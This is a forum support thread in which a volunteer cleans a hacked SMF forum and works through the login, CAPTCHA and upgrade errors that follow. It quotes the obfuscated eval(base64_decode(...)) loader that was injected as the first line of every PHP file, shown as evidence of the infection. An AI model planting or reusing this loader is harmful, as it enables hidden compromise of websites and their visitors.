News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

forum not found...

Started by jiajia, December 27, 2010, 12:49:09 AM

Previous topic - Next topic

kat

OK. To the best of my knowledge, you now have clean files.

First thing to do, I'd suggest, is to BACKUP YOUR FORUM!!

That way, should you get reinfected, you'll have clean files to replace everything with. :)

I notice that you have a directory named "languages.BACKUP". Every single file, in there, is infected.

If you don't need that, just delete the whole directory.

I checked the javascript files, but they don't seem to have been got-at.

Everything SHOULD be OK, now. :)

Might be an idea to let your host know about the infection, too.

This line was added to every php file, as the first line:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2tpbmdzdGVyL3B1YmxpY19odG1sL2Jsb2cvd3AtaW5jbHVkZXMvanMvdGlueW1jZS90aGVtZXMvYWR2YW5jZWQvc2tpbnMvbzJrNy9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

I took your site out of Maintenance mode and everything seems OK.

jiajia

I can't thank you enough. Made the backup and I'll see how things go. The wordpress blog doesn't seem to be functioning but it should be tame enough. All you did was remove that line at the top from every .php file? I had started doing that, but wasn't seeing any results so I had stopped after like ten...

kat

Yeah, I know the feeling.

Sadly, it's often the way that things can be affected by just one file, even though every other one was clean.

I'd like to meet some of these hackers and get locked in a room, with them...

Script-kiddies with minuscule penises, I reckon, like their Spam friends. ;)

jiajia

There seems to be some sort of issue with submitting data. Everything works, you can click around and read old posts, until you try to login or post.... then it has some sort of error. You'll see what I mean if you try to register...?

kat

No images in CAPTCHA...

Lemme check those.

BRB.

jiajia

Something going on with the uploader as well... I think I may have gone overboard deleting files, but the updater informs me that "The upgrader found some old or outdated language files.

Please make certain you uploaded the new versions of all the files included in the package, even the theme and language files for the default theme.

Click here to try again. "

I re-uploaded a brand spankin' new smf update, uploaded it, and still the same. I'm starting to think hosting a forum wasn't the best idea to volunteer for.

kat

Weirdness...

Your default theme had a billion language DIRECTORIES in it's "images" directory, for some reason...

Is this forum relatively new, by any chance?

jiajia

Quote from: K@ on January 10, 2011, 01:01:42 PM
Weirdness...

Your default theme had a billion language DIRECTORIES in it's "images" directory, for some reason...

Is this forum relatively new, by any chance?

Define new, its more than  a year old, possibly two...

kat

As you've just backed-up, let me get rid of some stuff that's definitely in the wrong places.

Gimme a while, again...

kat

Can you PM me an admin account access, please?

I can check some other stuff out, then.

kat

Found something... :)

Gimme ten minutes, or so. ;)

jiajia

Quote from: K@ on January 10, 2011, 01:28:17 PM
Found something... :)

Gimme ten minutes, or so. ;)
5....4....3...2....? :P

kat

Everything's clean, but I'm getting session ID hassles, when I try to log in.

I'm trying to figure-out why.

Advertisement: